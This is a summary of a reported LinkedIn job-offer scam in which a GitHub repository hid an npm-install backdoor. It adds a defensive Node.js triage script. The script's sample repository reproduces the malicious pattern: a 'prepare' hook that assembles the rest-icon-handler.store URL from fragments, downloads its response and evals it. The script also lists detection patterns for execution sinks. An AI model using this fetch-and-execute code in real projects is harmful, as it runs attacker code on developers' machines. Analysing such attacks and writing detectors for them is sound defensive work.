Backdoor discovered in fake LinkedIn job offer GitHub repo

Original: A backdoor in a LinkedIn job offer

Why This Matters

Demonstrates evolving supply chain attack sophistication using social engineering and borrowed identities to bypass developer vigilance.

A developer received a LinkedIn recruiter message with a malicious GitHub repository containing a supply chain backdoor disguised as test code. The payload executes arbitrary code automatically when npm install runs, using stolen identities for both the recruiter and commit author.

A full-stack Python developer reported discovering a supply chain attack via LinkedIn. A recruiter at a purported crypto startup sent a GitHub repository for code review, specifically asking to "check out the deprecated Node modules issue." The developer used a throwaway VPS and read-only AI tools to inspect the code instead of cloning locally.

The malicious code was embedded in app/test/index.js, a 250-line file disguised as a test suite. It assembled a URL (https://rest-icon-handler.store/icons/77) from fragmented strings hidden among commented-out tests, then executed whatever code the server returned. The payload triggered automatically via npm's prepare script, which runs after npm install, the intended attack vector.

Investigation revealed the recruiter's profile belonged to a real arts journalist with no technical background, yet it suddenly displayed npm expertise when pushing the developer to run npm install. The repository's 39-commit history was attributed to a real full-stack engineer who confirmed he never worked on it and had experienced GitHub impersonation before. The attack demonstrated how supply chain compromises can target developers through social engineering and stolen identities.
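As an added example (not code from the original post or the developer's own tooling), the following Node script performs the kind of pre-install triage the write-up implies: it lists the npm lifecycle hooks a package.json would run on its own, and flags source files that assemble a remote host from string fragments and route data into a code-execution sink. The repository snapshot, the benign file, the commands and all function names are constructed for this example; the domain rest-icon-handler.store and the path app/test/index.js are the ones named in the post.

```javascript
// Added example, not code from the original post. Pre-install triage for a
// repository you have been asked to "review": answer two questions before
// anyone types `npm install`.
//   1. Which npm lifecycle hooks would run code automatically?
//   2. Does any source file assemble a remote URL from string fragments and
//      feed data into an execution sink (the pattern in the write-up)?

// Hooks npm runs on its own during install/pack, with no explicit `npm run`.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall", "prepare", "prepublish", "prepack", "postpack",
];
// Modules that give a script network or code-execution capability.
const RISKY_REQUIRES = /require\(\s*["'](https?|net|dgram|child_process|vm)["']\s*\)/g;
// Sinks that turn data into running code.
const EXEC_SINKS = /\beval\s*\(|\bnew\s+Function\b|\bFunction\s*\(|\.runIn(This|New)Context\s*\(/;
// A scheme+host, visible only once the literals are concatenated in source order.
const REMOTE_HOST = /https?:\/\/[a-z0-9.-]+\.[a-z]{2,}/i;

// Which lifecycle scripts would npm execute without being asked?
function findLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// One pass over the source: collect string literals and drop comments.
// Done by hand because "://" inside a string must not be treated as a comment.
function tokenize(source) {
  const literals = [];
  let code = "";
  let i = 0;
  while (i < source.length) {
    const c = source[i], next = source[i + 1];
    if (c === "/" && next === "/") {             // line comment: skip to end of line
      const nl = source.indexOf("\n", i);
      i = nl < 0 ? source.length : nl;
      continue;
    }
    if (c === "/" && next === "*") {             // block comment: skip to closing */
      const end = source.indexOf("*/", i + 2);
      i = end < 0 ? source.length : end + 2;
      continue;
    }
    if (c === '"' || c === "'" || c === "`") {   // string literal: collect its contents
      let j = i + 1, buf = "";
      while (j < source.length && source[j] !== c) {
        if (source[j] === "\\") { buf += source[j + 1] ?? ""; j += 2; } // keep escaped char
        else buf += source[j++];
      }
      literals.push(buf);
      code += source.slice(i, j + 1);
      i = j + 1;
      continue;
    }
    code += c;
    i++;
  }
  return { literals, code };
}

// Scan one source file for the fetch-and-execute pattern.
function scanSource(source) {
  const { literals, code } = tokenize(source);
  const findings = [];
  const host = literals.join("").match(REMOTE_HOST);
  if (host) {
    const inOneLiteral = literals.some((s) => REMOTE_HOST.test(s));
    findings.push({ kind: inOneLiteral ? "remote-url" : "fragmented-remote-url", detail: host[0] });
  }
  for (const m of code.matchAll(RISKY_REQUIRES)) findings.push({ kind: "risky-require", detail: m[1] });
  if (EXEC_SINKS.test(code)) findings.push({ kind: "exec-sink", detail: "eval/Function/vm" });
  const hasExec = findings.some((f) => f.kind === "exec-sink");
  const hasRemote = findings.some((f) => f.kind !== "exec-sink");
  const verdict = hasExec && hasRemote ? "suspicious" : findings.length ? "review" : "clean";
  return { verdict, findings };
}

// Triage a repo snapshot given as { "relative/path": "file contents" }.
function triage(repoFiles) {
  const report = { lifecycle: findLifecycleScripts(repoFiles["package.json"] || "{}"), files: {} };
  for (const [name, text] of Object.entries(repoFiles)) {
    if (/\.[cm]?js$/.test(name)) report.files[name] = scanSource(text);
  }
  return report;
}

// Constructed sample resembling the repository described in the write-up.
const SAMPLE_REPO = {
  "package.json": JSON.stringify({
    name: "take-home-review",
    scripts: { test: "mocha app/test", prepare: "node app/test/index.js" },
  }),
  "app/test/index.js": [
    '// describe("deprecated module", () => {',
    '//   it("still loads", () => { expect(true).toBe(true); });',
    '// });',
    'const a = "ht" + "tps" + "://";',
    '// it("handles icons", () => {});',
    'const b = "rest-icon-handler" + ".store" + "/icons/" + "77";',
    'require("https").get(a + b, (res) => {',
    '  let body = ""; res.on("data", (d) => (body += d));',
    '  res.on("end", () => eval(body));',
    '});',
  ].join("\n"),
  "app/src/version.js": [
    'function parseVersion(s) { const [major, minor] = s.split(".").map(Number); return { major, minor }; }',
    'module.exports = { parseVersion };',
  ].join("\n"),
};

console.log(JSON.stringify(triage(SAMPLE_REPO), null, 2));
```

The fragment check deliberately concatenates literals in source order after comments are removed, which is exactly the layout the post describes (live fragments interleaved with commented-out tests); fragments shuffled through variables or array indices would need a real parser rather than this tokenizer, and regex literals containing quote characters can confuse it. Treat the output as a prompt for manual review, and keep doing that review on a disposable machine as the developer did.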

Source

roman.pt — Read original →